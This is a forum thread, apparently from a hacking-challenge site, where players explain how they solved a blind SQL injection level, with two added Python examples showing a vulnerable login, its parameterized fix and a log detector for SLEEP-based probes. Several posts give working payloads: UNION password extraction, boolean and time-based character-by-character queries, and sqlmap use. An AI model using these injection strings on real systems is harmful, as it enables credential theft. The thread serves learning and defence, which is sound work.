Inscrutable
Posted: Thu Dec 11, 2008 9:23 pm
by MerickOWA
Very enjoyable series of problems.
I knew the idea of SQL injection but never actually attempted to use it before. Was a neat lesson; I'd be curious as to what causes the
Unknown column 'grtPW4h4ck3rzYO' in 'where clause'
If you use
' UNION SELECT password FROM user --
as the name on the "Forced Entry" page. I was happy to see the password in plain text, but have no idea what PHP code caused that error.
Posted: Thu Dec 11, 2008 9:27 pm
by MerickOWA
I ended up writing a program to do a binary search on each character of the password. Was really kinda fun.

Just goes to show you what is possible even without any error messages and a little bit of guess work.
Posted: Thu Dec 11, 2008 10:08 pm
by gfoot
I think a binary search is the right way to do this. What did you use for feedback? The idea was to not give any visible feedback on success, failure, or unparsability of the query. I think there ended up being a few holes though.
Posted: Thu Dec 11, 2008 10:41 pm
by MerickOWA
I used 'logged in' as feedback.
Basically I made the sql query that was being constructed search for a bogus username, then tacked on a union select which always gave the result 'test' and conditionalized it with a WHERE and a sub query which grabbed the password for root, stripped out a particular character and tested to see if it was below a particular number.
If it failed that test, my union select failed and returned no results, which meant I got an error; otherwise I got the result 'test', which matched the query and got a 'logged in' result.
Posted: Wed Jan 21, 2009 12:28 pm
by efe
I simply used the response time as feedback for my binary search.
The SLEEP() function is very useful for this.
BENCHMARK() could also be used but this function is not allowed here.
Posted: Sun Jul 05, 2009 3:33 am
by therethinker
I tried using binary search; something weird happened and I got "uifmvwuibucvsot". So I ended up doing it by hand. On the last one I did "binary" search by hand (but not really binary, more like 10's). So I used LIKE '% %' to figure out all the characters that were in it (thankfully all lowercase!), then I used it to start from 1 and expand.
Example:
root' AND password LIKE 'th%' UNION SELECT '1
And 1 as the password.
Posted: Mon Nov 23, 2009 2:33 am
by tails
Hi!
MerickOWA, I guess the code is like:
SELECT id FROM user WHERE name = '$name'
SELECT password FROM user WHERE id = $id
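A reconstruction of the two-query flow tails guesses at, as an added example (not the challenge's own PHP): sqlite3 stands in for MySQL, the table layout and the function names are assumptions, and the stored value is the one the thread's error message quoted. It shows why the UNION input from the first post surfaces the password inside an "unknown column" error, and the parameterized version that does not.

```python
import sqlite3

# Constructed stand-in for the challenge database; the stored value is the one
# the thread's error message quoted, and PAYLOAD is the first post's input.
PASSWORD = "grtPW4h4ck3rzYO"
PAYLOAD = "' UNION SELECT password FROM user --"

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER, name TEXT, password TEXT)")
    db.execute("INSERT INTO user VALUES (1, 'root', ?)", (PASSWORD,))
    return db

def login_vulnerable(db, name):
    """Hypothetical two-query login as guessed in the thread: the name is
    interpolated into query one, and the id it returns is interpolated,
    unquoted, into query two."""
    row = db.execute(f"SELECT id FROM user WHERE name = '{name}'").fetchone()
    if row is None:
        return "login failed"
    # With the UNION payload row[0] is the password string, so query two now
    # contains a bare identifier and the database reports an unknown column
    # (MySQL words it "Unknown column '...' in 'where clause'").
    pw = db.execute(f"SELECT password FROM user WHERE id = {row[0]}").fetchone()
    return "logged in" if pw else "login failed"

def login_hardened(db, name):
    """Same flow with bound parameters: user input is only ever data."""
    row = db.execute("SELECT id FROM user WHERE name = ?", (name,)).fetchone()
    if row is None:
        return "login failed"
    pw = db.execute("SELECT password FROM user WHERE id = ?", (row[0],)).fetchone()
    return "logged in" if pw else "login failed"

def error_for(login, name):
    """Return the database error text a login attempt raises, or None."""
    try:
        login(make_db(), name)
        return None
    except sqlite3.Error as exc:
        return str(exc)

if __name__ == "__main__":
    print(error_for(login_vulnerable, PAYLOAD))   # leaks the stored password
    print(login_hardened(make_db(), PAYLOAD))      # login failed
```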
Posted: Wed Jan 20, 2010 10:11 pm
by ffaadd
hi,
nice challenge. I've learned new techniques to get responses from SQL injections.
I've done this with something like that:
root' AND IF(ASCII(SUBSTRING(password,$x,1))=$n,SLEEP(2),1) or 1='1
$x is the position of the character and $n is the ASCII code.
ciao,
ffaadd
Posted: Sun Dec 25, 2011 11:32 pm
by harvestsnow
Hello,
For the injection, I used
'UNION SELECT (ASCII(SUBSTR(password, $index,1))>>$shift)&1 FROM user where name='root'#
with 1 as the password.
And there's a way to get the source of the page, I don't know if it's intended.
Posted: Fri Nov 02, 2012 9:49 pm
by dangermouse
Some UNION hints here do not work anymore...
I did like the others, with manual binary search using ASCII(), LENGTH(), SUBSTR() and a lot of count(*). I also used yes/no questions on the information_schema table to retrieve the right table and schema.
I wonder if there is some good tool to automate all this yes/no stuff?
anyway, nice challenge!
Posted: Thu Jan 03, 2013 10:24 am
by Roogley
dangermouse wrote: I wonder if there is some good tool to automate all this yes/no stuff?
Just take a look at sqlmap.
But since we're on hacker.org, what about cheating and just re-using the Fort Knox exploit?
I used the following username on Fort Knox:
' UNION SELECT password FROM injecto2.user#
Posted: Tue Mar 12, 2013 6:51 pm
by haellowyyn
I had exactly the same idea as Roogley. Since all three challenges are on the same database server, you can simply retrieve the password from one of the former challenges. sqlmap makes that ridiculously easy.
Posted: Wed Mar 27, 2013 12:02 am
by gandhi
sqlmap revealed a vulnerability for time-based injection.
I used the following string for the user field:
root' and if((select mid(password,16,1) from user limit 0,1)='z',sleep(10),1) AND 'kzQg'='kzqg'
--------------------------------------------------------------------x------x
and a script to loop through the alphabet and the positions of the password

Posted: Wed Mar 27, 2013 1:00 am
by aurora
gandhi wrote: sqlmap revealed a vulnerability for time-based injection.
I used the following string for the user field:
root' and if((select mid(password,16,1) from user limit 0,1)='z',sleep(10),1) AND 'kzQg'='kzqg'
--------------------------------------------------------------------x------x
and a script to loop through the alphabet and the positions of the password

i let sqlmap do the rest, too

... was very interesting to see how powerful sqlmap is.
Posted: Tue Aug 05, 2014 3:22 pm
by destiny
Very nice challenge, since I never knew about time-based attacks. I used sqlmap to help me confirm my suspicions about sleep() and I found a nice article (http://www.rafayhackingarticles.net/201 ... based.html) explaining how to exploit it.
Edit: now I see that I could have done this easily with the dump option in sqlmap, but it was good to understand how it works rather than just by magic.
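From the defender's side, as an added example that is not from the thread or the challenge site: a small detector that reads constructed web-server log lines (the log format, the IPs, the paths and the timings are all assumptions) and flags requests whose decoded parameters carry the SLEEP()/BENCHMARK() style probes efe, ffaadd and gandhi describe and whose response time matches the delay, which is the pairing that distinguishes a timing oracle from ordinary slow pages.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed log lines: client, request, status, response time in ms.
# The two slow hits carry probes of the kind quoted in the thread.
LOG_LINES = [
    '10.0.0.5 "POST /forced-entry.php?name=root" 200 12ms',
    '10.0.0.9 "POST /forced-entry.php?name=root%27+AND+IF%28ASCII%28SUBSTRING%28password%2C1%2C1%29%29%3D103%2CSLEEP%282%29%2C1%29+or+1%3D%271" 200 2015ms',
    '10.0.0.9 "POST /forced-entry.php?name=root%27+and+if%28%28select+mid%28password%2C16%2C1%29+from+user+limit+0%2C1%29%3D%27z%27%2Csleep%2810%29%2C1%29+AND+%27kzQg%27%3D%27kzqg%27" 200 10022ms',
    '10.0.0.7 "GET /index.php" 200 8ms',
]

LOG_RE = re.compile(r'^(\S+) "(\w+) (\S+)" (\d{3}) (\d+)ms$')
# MySQL functions that stall a query on purpose: SLEEP() is the one the thread
# used, BENCHMARK() the one it says the challenge blocked.
DELAY_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)

def parse_line(line):
    """Split one log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status, ms = m.groups()
    return {"ip": ip, "method": method, "path": path,
            "status": int(status), "ms": int(ms)}

def find_time_based_probes(lines, slow_ms=1000):
    """Return (ip, parameter, ms) for requests that both contain a delay
    function in a decoded query parameter and exceeded the slow threshold."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["ms"] < slow_ms:
            continue
        params = parse_qs(urlsplit(rec["path"]).query)  # also percent-decodes
        for key, values in params.items():
            if any(DELAY_RE.search(v) for v in values):
                hits.append((rec["ip"], key, rec["ms"]))
    return hits

if __name__ == "__main__":
    for hit in find_time_based_probes(LOG_LINES):
        print("possible time-based probe:", hit)
```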